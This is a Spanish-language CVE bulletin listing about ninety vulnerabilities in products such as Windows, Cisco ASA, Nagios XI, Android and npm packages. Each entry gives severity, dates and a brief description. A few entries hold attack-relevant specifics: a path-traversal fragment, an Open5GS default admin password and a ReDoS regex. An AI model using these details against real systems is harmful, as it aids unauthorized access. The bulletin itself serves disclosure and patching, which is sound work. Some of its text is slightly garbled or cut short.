Boletín de vulnerabilidades

Vulnerabilidades con productos recientemente documentados:

No hay vulnerabilidades nuevas para los productos a los que está suscrito.



Otras vulnerabilidades de los productos a los que usted está suscrito, y cuya información ha sido actualizada recientemente:

  • Vulnerabilidad en el archivo hue-magic.js en la API res.sendFile en node-red-contrib-huemagic (CVE-2021-25864)
    Severidad: MEDIA
    Fecha de publicación: 26/01/2021
    Fecha de última actualización: 16/08/2023
    node-red-contrib-huemagic versión 3.0.0, está afectado por un Salto de Directorio de hue/assets/..%2F en la API res.sendFile, usada en el archivo hue-magic.js, para recuperar un archivo arbitrario
  • CVE-2021-25863
    Severidad: ALTA
    Fecha de publicación: 26/01/2021
    Fecha de última actualización: 08/08/2023
    Open5GS versión 2.1.3 escucha sobre 0.0.0.0:3000 y presenta una contraseña predeterminada de 1423 para la cuenta de administrador
  • CVE-2021-26267
    Severidad: MEDIA
    Fecha de publicación: 26/01/2021
    Fecha de última actualización: 08/08/2023
    cPanel versiones anteriores a 92.0.9, permite a un usuario de MySQL (que presenta un hash de contraseña antiguo) omitir una suspensión (SEC-579)
  • CVE-2021-23329
    Severidad: MEDIA
    Fecha de publicación: 31/01/2021
    Fecha de última actualización: 08/08/2023
    El paquete nested-object-assign versiones anteriores a 1.0.4, es vulnerable a una Contaminación de Prototipo mediante la función predeterminada, como es demostrado al ejecutar la PoC a continuación
  • CVE-2021-25912
    Severidad: ALTA
    Fecha de publicación: 02/02/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de contaminación del prototipo en "dotty" versiones 0.0.1 hasta 0.1.0, permite a atacantes causar una denegación de servicio y puede conllevar a una ejecución de código remota
  • CVE-2021-25761
    Severidad: MEDIA
    Fecha de publicación: 03/02/2021
    Fecha de última actualización: 08/08/2023
    En JetBrains Ktor versiones anteriores a 1.5.0, fue posible un ataque de tipo birthday en la clave de SessionStorage
  • CVE-2021-0336
    Severidad: ALTA
    Fecha de publicación: 10/02/2021
    Fecha de última actualización: 08/08/2023
    En la función onReceive del archivo BluetoothPermissionRequest.java, se presenta una posible omisión de permisos debido a un PendingIntent mutable. Esto podría conllevar a una escalada de privilegios local que omite una comprobación de permisos, con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-9 Android-10 Android-11 Android-8.1, ID de Android: A-158219161
  • CVE-2021-21472
    Severidad: MEDIA
    Fecha de publicación: 09/02/2021
    Fecha de última actualización: 08/08/2023
    SAP Software Provisioning Manager versión 1.0 (SAP NetWeaver Master Data Management Server versión 7.1) no posee una opción para ajustar una contraseña durante su instalación, esto permite a un atacante autenticado llevar a cabo varios ataques de seguridad como Salto de Directorio, Ataque de Fuerza Bruta de Contraseña, Ataque de SMB Relay, Degradación de la Seguridad
  • CVE-2021-27101
    Severidad: ALTA
    Fecha de publicación: 16/02/2021
    Fecha de última actualización: 08/08/2023
    Accellion versiones FTA 9_12_370 y anteriores, están afectadas por una inyección SQL por medio de un encabezado de Host diseñado en una petición al archivo document_root.html. La versión corregida es FTA_9_12_380 y posteriores
  • CVE-2021-0109
    Severidad: MEDIA
    Fecha de publicación: 17/02/2021
    Fecha de última actualización: 08/08/2023
    Los permisos heredados no seguros para el paquete de controladores Intel® SOC para STK1A32SC versión anterior a 604, pueden permitir a un usuario autenticado habilitar potencialmente una escalada de privilegios por medio de un acceso local
  • CVE-2021-25648
    Severidad: ALTA
    Fecha de publicación: 16/02/2021
    Fecha de última actualización: 08/08/2023
    La aplicación movil "Testes de Codigo" versiones 11.4 y anteriores, permite a un atacante conseguir acceso a la interfaz administrativa y las funcionalidades premium al alterar el valor booleano de los parámetros "isAdmin" e "isPremium" ubicados en el almacenamiento del dispositivo
  • CVE-2020-29369
    Severidad: MEDIA
    Fecha de publicación: 28/11/2020
    Fecha de última actualización: 28/07/2023
    Se detectó un problema en el archivo mm/mmap.c en el kernel de Linux versiones anteriores a 5.7.11. Se presenta una condición de carrera entre determinadas funciones expand (expand_downwards y expand_upwards) y operaciones de liberación de page-table de una llamada munmap, también se conoce como CID-246c320a8cfe
  • CVE-2021-25913
    Severidad: ALTA
    Fecha de publicación: 08/02/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de contaminación del prototipo en "set-or-get" versiones 1.0.0 hasta 1.2.10, permite a un atacante causar una denegación de servicio y puede conllevar a una ejecución de código remota
  • CVE-2021-25296
    Severidad: ALTA
    Fecha de publicación: 15/02/2021
    Fecha de última actualización: 08/08/2023
    Nagios XI versión xi-5.7.5, esta afectada por una inyección de comandos del Sistema Operativo. La vulnerabilidad se presenta en el archivo /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php debido a un saneamiento inapropiado de la entrada controlada por el usuario autenticado mediante una única petición HTTP, que puede conllevar a una inyección de comandos del el servidor de Nagios XI
  • CVE-2021-25298
    Severidad: ALTA
    Fecha de publicación: 15/02/2021
    Fecha de última actualización: 08/08/2023
    Nagios XI versión xi-5.7.5, esta afectada por una inyección de comandos del Sistema Operativo. La vulnerabilidad se presenta en el archivo /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php debido a un saneamiento inapropiado de la entrada controlada por el usuario autenticado mediante una única petición HTTP, lo que puede conducir a una inyección de comandos del Sistema Operativo en el servidor de Nagios XI
  • CVE-2021-21126
    Severidad: MEDIA
    Fecha de publicación: 09/02/2021
    Fecha de última actualización: 08/08/2023
    Una aplicación de políticas insuficientes en extensions de Google Chrome versiones anteriores a 88.0.4324.96, permitió a un atacante remoto omitir el aislamiento del sitio por medio de una Extension de Chrome diseñada
  • CVE-2021-23126
    Severidad: MEDIA
    Fecha de publicación: 04/03/2021
    Fecha de última actualización: 08/08/2023
    Se detectó un problema en Joomla! versiones 3.2.0 hasta 3.9.24. Uso de la función no segura rand() dentro del proceso de generación del secreto 2FA
  • CVE-2021-25914
    Severidad: ALTA
    Fecha de publicación: 01/03/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de contaminación de prototipo en "object-collider" versiones 1.0.0 hasta 1.0.3, permite al atacante causar una denegación de servicio y puede conllevar a una ejecución de código remota
  • CVE-2021-25297
    Severidad: ALTA
    Fecha de publicación: 15/02/2021
    Fecha de última actualización: 08/08/2023
    Nagios XI versión xi-5.7.5, esta afectada por una inyección de comandos del Sistema Operativo. La vulnerabilidad se presenta en el archivo /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php debido a un saneamiento inapropiado de la entrada controlada por el usuario autenticado mediante una única petición HTTP, lo que puede conllevar a una inyección de comandos del sistema operativo en el servidor de Nagios XI
  • CVE-2020-36158
    Severidad: ALTA
    Fecha de publicación: 05/01/2021
    Fecha de última actualización: 28/07/2023
    La función mwifiex_cmd_802_11_ad_hoc_start en el archivo drivers/net/wireless/marvell/mwifiex/join.c en el kernel de Linux versiones hasta 5.10.4, podría permitir a atacantes remotos ejecutar código arbitrario por medio de un valor SSID grande, también se conoce como CID-5c455c5ab332
  • CVE-2021-0386
    Severidad: MEDIA
    Fecha de publicación: 10/03/2021
    Fecha de última actualización: 08/08/2023
    En onCreate de UsbConfirmActivity, se presenta un posible vector de tapjacking debido a un valor predeterminado no seguro. Esto podría conllevar a una escalada de privilegios local con los privilegios de ejecución User necesarios. Es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-11, ID de Android: A-173421110
  • CVE-2021-0391
    Severidad: MEDIA
    Fecha de publicación: 10/03/2021
    Fecha de última actualización: 08/08/2023
    En la función onCreate() del archivo ChooseTypeAndAccountActivity.java, se presenta una manera posible de conocer la existencia de una cuenta, sin permisos, debido a un ataque de tipo tapjacking/overlay. Esto podría conllevar a una escalada de privilegios local con los privilegios de ejecución User necesarios. Es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-11 Android-8.1 Android-9 Android-10, ID de Android: A-172841550
  • CVE-2021-0369
    Severidad: MEDIA
    Fecha de publicación: 10/03/2021
    Fecha de última actualización: 08/08/2023
    En el archivo CrossProfileAppsServiceImpl.java, se presenta la posibilidad de que el estado de concesión INTERACT_ACROSS_PROFILES de una aplicación no se muestre apropiadamente en la interfaz de usuario de configuración debido a un error lógico en el código. Esto podría conllevar a una escalada de privilegios local sin ser necesarios privilegios de ejecución adicionales. Es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-11, ID de Android: A-166561076
  • CVE-2021-26411
    Severidad: MEDIA
    Fecha de publicación: 11/03/2021
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Corrupción de la Memoria de Internet Explorer
  • CVE-2021-23354
    Severidad: MEDIA
    Fecha de publicación: 12/03/2021
    Fecha de última actualización: 08/08/2023
    El paquete printf versiones anteriores a 0.6.1, es vulnerable a una Denegación de Servicio de Expresión Regular (ReDoS) por medio de la cadena de expresiones regulares /\%(?:\(([\w_.]+)\)|([1-9]\d*)\$)?([0+\ -\]*)(\* |\d+)?(\.)? (\*|\D+)? [HlL]?([\% BscdeEfFgGioOuxX])/g en la biblioteca lib/printf.js. La expresión regular vulnerable tiene una complejidad de tiempo en el peor de los casos cúbica
  • CVE-2021-27885
    Severidad: MEDIA
    Fecha de publicación: 02/03/2021
    Fecha de última actualización: 08/08/2023
    El archivo usersettings.php en e107 hasta la versión 2.3.0, carece de cierto mecanismo de protección e_TOKEN
  • CVE-2021-25916
    Severidad: ALTA
    Fecha de publicación: 16/03/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de contaminación del prototipo en "patchmerge" versiones 1.0.0 hasta 1.0.1, permite a un atacante causar una denegación de servicio y puede conllevar a una ejecución de código remota
  • Vulnerabilidad en Microsoft Enhanced Cryptographic Provider (CVE-2021-31201)
    Severidad: MEDIA
    Fecha de publicación: 08/06/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Escalada de Privilegios en Microsoft Enhanced Cryptographic Provider. Este ID de CVE es diferente de CVE-2021-31199
  • Vulnerabilidad en Windows Print Spooler (CVE-2021-1675)
    Severidad: ALTA
    Fecha de publicación: 08/06/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Escalada de Privilegios de Windows Print Spooler
  • CVE-2021-26414
    Severidad: MEDIA
    Fecha de publicación: 08/06/2021
    Fecha de última actualización: 01/08/2023
    Omisión de la Funcionalidad de Seguridad en Windows DCOM Server
  • Vulnerabilidad en Microsoft Enhanced Cryptographic Provider (CVE-2021-31199)
    Severidad: MEDIA
    Fecha de publicación: 08/06/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Escalada de Privilegios en Microsoft Enhanced Cryptographic Provider. Este ID de CVE es diferente de CVE-2021-31201
  • Vulnerabilidad en Microsoft SharePoint Server (CVE-2021-31948)
    Severidad: MEDIA
    Fecha de publicación: 08/06/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Suplantación de Identidad de Microsoft SharePoint Server. Este ID de CVE es diferente de CVE-2021-31950, CVE-2021-31964
  • CVE-2021-31956
    Severidad: ALTA
    Fecha de publicación: 08/06/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Escalada de Privilegios en Windows NTFS
  • CVE-2021-31957
    Severidad: MEDIA
    Fecha de publicación: 08/06/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Denegación de Servicio en ASP.NET
  • CVE-2021-31960
    Severidad: BAJA
    Fecha de publicación: 08/06/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Divulgación de Información en Windows Bind Filter Driver
  • CVE-2021-31962
    Severidad: ALTA
    Fecha de publicación: 08/06/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Omisión de la Característica de Seguridad en Kerberos AppContainer
  • CVE-2021-31972
    Severidad: BAJA
    Fecha de publicación: 08/06/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Divulgación de Información en Event Tracing para Windows
  • Vulnerabilidad en Server para NFS (CVE-2021-31975)
    Severidad: ALTA
    Fecha de publicación: 08/06/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Divulgación de Información en Server para NFS. Este ID de CVE es diferente de CVE-2021-31976
  • Vulnerabilidad en Server para NFS (CVE-2021-31976)
    Severidad: ALTA
    Fecha de publicación: 08/06/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Divulgación de Información en Server para NFS. Este ID de CVE es diferente de CVE-2021-31975
  • CVE-2021-33742
    Severidad: MEDIA
    Fecha de publicación: 08/06/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Ejecución de Código Remota en Windows MSHTML Platform
  • CVE-2021-0056
    Severidad: MEDIA
    Fecha de publicación: 09/06/2021
    Fecha de última actualización: 08/08/2023
    Unos permisos heredados no seguros para Intel® NUC M15 Laptop Kit Driver Pack software versiones anteriores a versión actualizada 1.1 pueden habilitar a un usuario autenticado para permitir potencialmente una escalada de privilegios por medio de un acceso local
  • Vulnerabilidad en el envío de una carga útil al puerto 5001 en un sistema de administración de conferencias de ZTE (CVE-2021-21741)
    Severidad: ALTA
    Fecha de publicación: 30/08/2021
    Fecha de última actualización: 05/06/2023
    Un sistema de administración de conferencias de ZTE, está afectado por una vulnerabilidad de ejecución de comandos. Dado que el servicio de objetos java de soapmonitor está habilitado por defecto, el atacante podría aprovechar esta vulnerabilidad para ejecutar comandos arbitrario mediante el envío de una carga útil deserializada al puerto 5001.
  • CVE-2021-21972
    Severidad: ALTA
    Fecha de publicación: 24/02/2021
    Fecha de última actualización: 08/08/2023
    El VSphere Client (HTML5) contiene una vulnerabilidad de ejecución de código remota en un plugin de vCenter Server. Un actor malicioso con acceso de red al puerto 443 puede explotar este problema para ejecutar comandos con privilegios no restringidos en el sistema operativo subyacente que aloja vCenter Server. Esto afecta a VMware vCenter Server (versiones 7.x anteriores a 7.0 U1c, versiones 6.7 anteriores a 6.7 U3l y versiones 6.5 anteriores a 6.5 U3n) y VMware Cloud Foundation (versiones 4.x anteriores a 4.2 y versiones 3.x anteriores a 3.10.1.2)
  • CVE-2021-33582
    Severidad: MEDIA
    Fecha de publicación: 01/09/2021
    Fecha de última actualización: 08/08/2023
    Cyrus IMAP versiones anteriores a 3.4.2, permite a atacantes remotos causar una denegación de servicio (cuelgue del demonio de varios minutos) por medio de una entrada manejada inapropiadamente durante la interacción de la tabla hash. Debido a que presenta muchas inserciones en un solo cubo, strcmp se vuelve lento. Esto se ha corregido en las versiones 3.4.2, 3.2.8 y 3.0.16
  • CVE-2021-31797
    Severidad: BAJA
    Fecha de publicación: 01/09/2021
    Fecha de última actualización: 08/08/2023
    El mecanismo de identificación de usuarios usado por CyberArk Credential Provider versiones anteriores a 12.1, es susceptible a una condición de carrera del host local, conllevando a una divulgación de contraseña
  • CVE-2021-38703
    Severidad: ALTA
    Fecha de publicación: 01/09/2021
    Fecha de última actualización: 08/08/2023
    Unos dispositivos inalámbricos que ejecutan determinados firmware derivados de Arcadyan (como KPN Experia WiFi versión 1.00.15) no sanean correctamente la entrada del usuario en el formulario de configuración del syslog. Un atacante remoto autenticado podría aprovechar esto para alterar la configuración del dispositivo y lograr una ejecución de código remota. Esto puede ser explotado en conjunto con CVE-2021-20090
  • CVE-2019-15992
    Severidad: ALTA
    Fecha de publicación: 22/09/2020
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la implementación del intérprete Lua integrado en Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software, podría permitir a un atacante remoto autenticado ejecutar código arbitrario con privilegios root en el sistema operativo Linux subyacente de un dispositivo afectado. La vulnerabilidad es debido a restricciones insuficientes en las llamadas a funciones Lua permitidas dentro del contexto de los scripts Lua suministrados por el usuario. Una explotación con éxito podría permitir al atacante desencadenar una condición de desbordamiento de la pila y ejecutar código arbitrario con privilegios root en el sistema operativo Linux subyacente de un dispositivo afectado
  • CVE-2021-34548
    Severidad: MEDIA
    Fecha de publicación: 29/06/2021
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Tor versiones anteriores a 0.4.6.5, también se conoce como TROVE-2021-003. Un atacante puede falsificar las funciones RELAY_END o RELAY_RESOLVED para omitir el control de acceso previsto para terminar un flujo
  • Vulnerabilidad en peticiones HTTP en la interfaz web de Cisco Adaptive Security Appliance (ASA) Software y Firepower Threat Defense (FTD) Software (CVE-2020-3304)
    Severidad: ALTA
    Fecha de publicación: 21/10/2020
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la interfaz web de Cisco Adaptive Security Appliance (ASA) Software y Firepower Threat Defense (FTD) Software, podría permitir a un atacante remoto no autenticado causar que un dispositivo afectado se recargue inesperadamente, resultando en una condición de denegación de servicio (DoS). La vulnerabilidad es debido a una falta de comprobación apropiada de entrada de las peticiones HTTP. Un atacante podría explotar esta vulnerabilidad mediante el envío de una petición HTTP diseñada hacia un dispositivo afectado. Una explotación podría permitir al atacante causar una condición de DoS. Nota: Esta vulnerabilidad se aplica al tráfico HTTP IP versión 4 (IPv4) e IP versión 6 (IPv6)
  • Vulnerabilidad en el análisis de las URL no válidas en la interfaz de servicios web del Cisco Adaptive Security Appliance (ASA) Software y el Cisco Firepower Threat Defense (FTD) Software (CVE-2020-3259)
    Severidad: MEDIA
    Fecha de publicación: 06/05/2020
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la interfaz de servicios web del Cisco Adaptive Security Appliance (ASA) Software y el Cisco Firepower Threat Defense (FTD) Software, podría permitir a un atacante remoto no autenticado recuperar contenido de la memoria sobre un dispositivo afectado, lo que podría conducir a la divulgación de información confidencial . La vulnerabilidad es debido a un problema de rastreo del búfer cuando el software analiza las URL no válidas que son solicitadas desde la interfaz de servicios web. Un atacante podría explotar esta vulnerabilidad mediante el envío de una petición GET diseñada hacia la interfaz de servicios web. Una explotación con éxito podría permitir a un atacante recuperar el contenido de la memoria, lo que podría conllevar a la divulgación de información confidencial. Nota: Esta vulnerabilidad solo afecta a configuraciones específicas de AnyConnect y WebVPN. Para más información, consulte la sección Vulnerable Products.
  • CVE-2021-31207
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Omisión de la Característica de Seguridad de Microsoft Exchange Server
  • CVE-2021-30713
    Severidad: MEDIA
    Fecha de publicación: 08/09/2021
    Fecha de última actualización: 08/08/2023
    Se abordó un problema de permisos con una comprobación mejorada. Este problema es corregido en macOS Big Sur versión 11.4. Una aplicación maliciosa puede ser capaz de omitir las preferencias de privacidad. Apple presenta conocimiento de un informe que indica que este problema puede haber sido explotado activamente
  • CVE-2021-31231
    Severidad: BAJA
    Fecha de publicación: 30/04/2021
    Fecha de última actualización: 08/08/2023
    Alertmanager en Grafana Enterprise Metrics versiones anteriores a 1.2.1 y Metrics Enterprise versión1.2.1, presenta una vulnerabilidad de divulgación de archivos locales cuando es usado experimental.alertmanager.enable-api. El archivo de contraseña de autenticación básica HTTP se puede usar como un vector de ataque para enviar cualquier contenido de archivo por medio de un webhook. Las plantillas de alertmanager pueden ser usado como vector de ataque para enviar cualquier contenido de archivo porque alertmanager puede cargar cualquier archivo de texto especificado en la lista de plantillas.
  • CVE-2021-25947
    Severidad: ALTA
    Fecha de publicación: 03/06/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de contaminación de prototipos en "nestie" versiones 0.0.0 hasta 1.0.0, permite a un atacante causar una denegación de servicio y puede conllevar una ejecución de código remota
  • CVE-2021-24330
    Severidad: BAJA
    Fecha de publicación: 01/06/2021
    Fecha de última actualización: 09/08/2023
    El plugin Funnel Builder by CartFlows – Create High Converting Sales Funnels para WordPress versiones anteriores a 1.6.13, no saneaba sus configuraciones facebook_pixel_id y google_analytics_id, permitiendo a usuarios muy privilegiados configurar una carga útil de tipo XSS en ellos, que se ejecutará en las páginas generadas por el plugin, o todo el sitio web, dependiendo de la configuración usada
  • CVE-2021-38163
    Severidad: ALTA
    Fecha de publicación: 14/09/2021
    Fecha de última actualización: 08/08/2023
    SAP NetWeaver (Visual Composer 7.0 RT) versiones - 7.30, 7.31, 7.40, 7.50, sin restricción, un atacante autenticado como usuario no administrativo puede cargar un archivo malicioso a través de la red y desencadenar su procesamiento, que es capaz de ejecutar comandos del sistema operativo con el privilegio del proceso del servidor Java. Estos comandos pueden ser usados para leer o modificar cualquier información en el servidor o apagar el servidor haciendo que no esté disponible
  • CVE-2021-36955
    Severidad: MEDIA
    Fecha de publicación: 15/09/2021
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios de Windows Common Log File System Driver. Este CVE ID es diferente de CVE-2021-36963, CVE-2021-38633
  • CVE-2018-1320
    Severidad: MEDIA
    Fecha de publicación: 07/01/2019
    Fecha de última actualización: 16/08/2023
    La librería de cliente Java de Apache Thrift, desde la versión 0.5.0 hasta la 0.11.0, puede omitir la validación de la negociación de SASL "isComplete" en la clase org.apache.thrift.transport.TSaslTransport. Una aserción utilizada para determinar si el handshake SASL se ha completado de manera exitosa podría deshabilitarse en los ajustes de producción, prohibiendo que la validación se complete.
  • CVE-2021-40823
    Severidad: MEDIA
    Fecha de publicación: 13/09/2021
    Fecha de última actualización: 08/08/2023
    Un error lógico en la funcionalidad de compartición de claves de sala de matrix-js-sdk (también conocido como Matrix Javascript SDK) antes de la versión 12.4.1 permite que un servidor doméstico de Matrix malicioso presente en una sala cifrada robe las claves de cifrado de la sala (a través de mensajes de protocolo de Matrix manipulados) que fueron enviados originalmente por los clientes de Matrix afectados que participan en esa sala. Esto permite al servidor doméstico descifrar los mensajes cifrados de extremo a extremo enviados por los clientes afectados.e dispositivo
  • CVE-2021-40824
    Severidad: MEDIA
    Fecha de publicación: 13/09/2021
    Fecha de última actualización: 08/08/2023
    Un error lógico en la funcionalidad de compartición de claves de sala de Element Android antes de la versión 1.2.2 y matrix-android-sdk2 (también conocido como Matrix SDK para Android) antes de la versión 1.2.2 permite a un servidor doméstico de Matrix malicioso presente en una sala cifrada robar las claves de cifrado de la sala (a través de mensajes de protocolo de Matrix falsificados) que fueron enviados originalmente por los clientes de Matrix afectados que participan en esa sala. Esto permite al atacante descifrar los mensajes cifrados de extremo a extremo enviados por los clientes afectados
  • CVE-2021-38646
    Severidad: MEDIA
    Fecha de publicación: 15/09/2021
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Ejecución de Código Remota en Microsoft Office Access Connectivity Engine
  • CVE-2021-38649
    Severidad: MEDIA
    Fecha de publicación: 15/09/2021
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Open Management Infrastructure. Este CVE ID es diferente de CVE-2021-38645, CVE-2021-38648
  • CVE-2021-38645
    Severidad: MEDIA
    Fecha de publicación: 15/09/2021
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Open Management Infrastructure. Este CVE ID es diferente de CVE-2021-38648, CVE-2021-38649
  • CVE-2021-36942
    Severidad: MEDIA
    Fecha de publicación: 12/08/2021
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de suplantación de identidad en Windows LSA
  • CVE-2021-23446
    Severidad: MEDIA
    Fecha de publicación: 29/09/2021
    Fecha de última actualización: 08/08/2023
    El paquete handsontable versiones anteriores a 10.0.0; el paquete handsontable desde la versión 0 y anterior a 10.0.0 son vulnerables a una Denegación de Servicio por Expresión Regular (ReDoS) en la función Handsontable.helper.isNumeric
  • CVE-2021-23445
    Severidad: MEDIA
    Fecha de publicación: 27/09/2021
    Fecha de última actualización: 15/08/2023
    Esto afecta al paquete datatables.net versiones anteriores a 1.11.3. Si se pasa un array a la función de entidades de escape de HTML no se escapa su contenido
  • CVE-2021-40325
    Severidad: MEDIA
    Fecha de publicación: 04/10/2021
    Fecha de última actualización: 08/08/2023
    Cobbler versiones anteriores a 3.3.0, permite omitir una autorización para modificar la configuración
  • CVE-2021-41073
    Severidad: ALTA
    Fecha de publicación: 19/09/2021
    Fecha de última actualización: 08/08/2023
    La función loop_rw_iter en fs/io_uring.c en el kernel de Linux desde la versión 5.10 hasta la versión 5.14.6 permite a los usuarios locales ganar privilegios mediante el uso de IORING_OP_PROVIDE_BUFFERS para desencadenar una liberación de un búfer del kernel, como se ha demostrado utilizando /proc//maps para su explotación
  • CVE-2021-41122
    Severidad: MEDIA
    Fecha de publicación: 05/10/2021
    Fecha de última actualización: 02/08/2023
    Vyper es un lenguaje de contrato inteligente de Python para el EVM. En las versiones afectadas, las funciones externas no comprueban correctamente los límites de los argumentos decimales. Esto puede conllevar a errores lógicos. Este problema ha sido resuelto en la versión 0.3.0
  • CVE-2021-41121
    Severidad: MEDIA
    Fecha de publicación: 06/10/2021
    Fecha de última actualización: 02/08/2023
    Vyper es un Lenguaje de Contrato Inteligente de Python para el EVM. En las versiones afectadas, cuando se lleva a cabo una llamada a una función dentro de una estructura literal, se presenta un problema de corrupción de memoria que se produce debido a un puntero incorrecto en la parte superior de la pila. Este problema ha sido resuelto en la versión 0.3.0
  • CVE-2021-32066
    Severidad: MEDIA
    Fecha de publicación: 01/08/2021
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Ruby versiones hasta 2.6.7, versiones 2.7.x hasta 2.7.3, y versiones 3.x hasta 3.0.1. Net::IMAP no lanza una excepción cuando StartTLS falla con una respuesta desconocida, lo que podría permitir a atacantes tipo man-in-the-middle omitir las protecciones TLS, al aprovechar una posición de red entre el cliente y el registro para bloquear el comando StartTLS, también se conoce como "StartTLS stripping attack"
  • CVE-2021-36934
    Severidad: MEDIA
    Fecha de publicación: 22/07/2021
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Windows
  • Vulnerabilidad en Windows NAT de Microsoft (CVE-2021-40463)
    Severidad: MEDIA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Denegación de Servicio de Windows NAT
  • Vulnerabilidad en el manejador de sesión SSL/TLS en Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software (CVE-2020-3572)
    Severidad: MEDIA
    Fecha de publicación: 21/10/2020
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en el manejador de sesión SSL/TLS Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software, podría permitir a un atacante remoto no autenticado causar una condición de denegación de servicio (DoS) en un dispositivo afectado. La vulnerabilidad es debido a una pérdida de memoria al cerrar las conexiones SSL/TLS en un estado específico. Un atacante podría explotar esta vulnerabilidad mediante el establecimiento de múltiples sesiones SSL/TLS y asegurándose de que estén cerradas en determinadas condiciones. Una explotación con éxito podría permitir a un atacante agotar los recursos de la memoria en el dispositivo afectado, lo que impediría el procesamiento de nuevas conexiones SSL/TLS, resultando en una DoS. Es requerida una intervención manual para recuperar un dispositivo afectado
  • Vulnerabilidad en el motor de inspección FTP de Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software (CVE-2020-3564)
    Severidad: MEDIA
    Fecha de publicación: 21/10/2020
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en el motor de inspección FTP de Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software, podría permitir a un atacante remoto no autenticado omitir la inspección FTP. La vulnerabilidad es debido a un seguimiento de flujo ineficiente del tráfico FTP. Un atacante podría explotar esta vulnerabilidad mediante el envío de tráfico FTP diseñado por medio de un dispositivo afectado. Una explotación con éxito podría permitir a un atacante omitir la inspección de FTP y completar con éxito las conexiones FTP
  • Vulnerabilidad en Windows Hyper-V de Microsoft (CVE-2021-40461)
    Severidad: MEDIA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de ejecución de código remota de Windows Hyper-V. Este ID de CVE es diferente de CVE-2021-38672
  • CVE-2021-40460
    Severidad: MEDIA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Omisión de la Funcionalidad de Seguridad de Windows Remote Procedure Call Runtime
  • CVE-2021-40456
    Severidad: MEDIA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Omisión de la Funcionalidad de Seguridad de Windows AD FS
  • Vulnerabilidad en Win32k de Microsoft (CVE-2021-41357)
    Severidad: MEDIA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Win32k. Este ID de CVE es único de CVE-2021-40449, CVE-2021-40450
  • CVE-2021-40455
    Severidad: BAJA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Suplantación de Identidad en Windows Installer
  • Vulnerabilidad en Win32k de Microsoft (CVE-2021-40450)
    Severidad: MEDIA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Win32k . Este ID de CVE es diferente de CVE-2021-40449, CVE-2021-41357
  • Vulnerabilidad en Windows Common Log File System Driver de Microsoft (CVE-2021-40443)
    Severidad: MEDIA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Common Log File System Driver. Este ID de CVE es diferente de CVE-2021-40466, CVE-2021-40467
  • CVE-2021-38663
    Severidad: BAJA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Divulgación de Información de Windows exFAT File System
  • Vulnerabilidad en Windows Fast FAT File System Driver de Microsoft (CVE-2021-38662)
    Severidad: MEDIA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Divulgación de Información en Windows Fast FAT File System Driver. Este ID de CVE es diferente de CVE-2021-41343
  • CVE-2021-36970
